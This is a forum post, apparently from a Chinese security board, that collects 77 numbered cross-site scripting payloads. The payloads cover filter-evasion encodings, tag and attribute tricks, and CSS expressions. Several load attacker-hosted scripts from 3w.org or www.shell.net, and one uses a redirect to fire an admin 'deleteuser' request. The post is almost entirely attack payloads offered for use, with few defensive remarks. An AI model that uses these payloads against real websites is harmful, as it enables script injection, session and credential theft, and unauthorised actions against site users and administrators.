XSS Attack Roundup

Posted by the thread starter on 2013-4-19 19:22:37
It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; not sure whether anyone needs to bookmark this.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolons, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character, part 2; null characters basically have no effect here in China, since there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-88&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE attribute (made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash lets you smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP address as a decimal dword
<A HREF="http://3232235521">XSS</A>
(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=146